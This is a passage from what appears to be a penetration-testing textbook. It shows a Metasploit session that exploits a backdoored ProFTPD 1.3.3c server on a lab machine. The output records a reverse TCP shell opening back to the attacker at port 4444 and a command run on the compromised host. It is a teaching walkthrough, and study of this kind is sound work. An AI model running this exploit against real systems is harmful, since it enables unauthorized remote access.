msf exploit(unix/ftp/proftpd_133c_backdoor) > show options 

Module options (exploit/unix/ftp/proftpd_133c_backdoor): 

   Name   Current Setting  Required  Description 
   ----   ---------------  --------  ----------- 
   RHOST                   yes       The target address 
   RPORT  21               yes       The target port (TCP) 

Exploit target: 

   Id  Name 
   --  ---- 
   0   Automatic 

msf exploit(unix/ftp/proftpd_133c_backdoor) > set RHOST 192.168.25.132 
RHOST => 192.168.25.132 
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit 

[*] Started reverse TCP double handler on 192.168.25.128:4444 
[*] 192.168.25.132:21 - Sending Backdoor Command 
[*] Accepted the first client connection... 
[*] Accepted the second client connection... 
[*] Command: echo ClwmatNvsNIhpE22; 
[*] Writing to socket A 
[*] Writing to socket B 
[*] Reading from sockets... 
[*] Reading from socket A 
[*] A: "ClwmatNvsNIhpE22\r\n" 
[*] Matching... 
[*] B is input... 
[*] Command shell session 2 opened (192.168.25.128:4444 -> 192.168.25.132:41588) at 2018-09-27 15:55:32 +0530 

uname -a 
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 

Figure 4-11. Output of the search query for proftpd and execution of 
the proftpd_133c_backdoor exploit on the target system 


The exploit code runs successfully and gives you a shell on the target 
system. 

Hence, you were successful in exploiting your target in two different 
ways, once through WordPress and another through the FTP server. 

Congratulations! 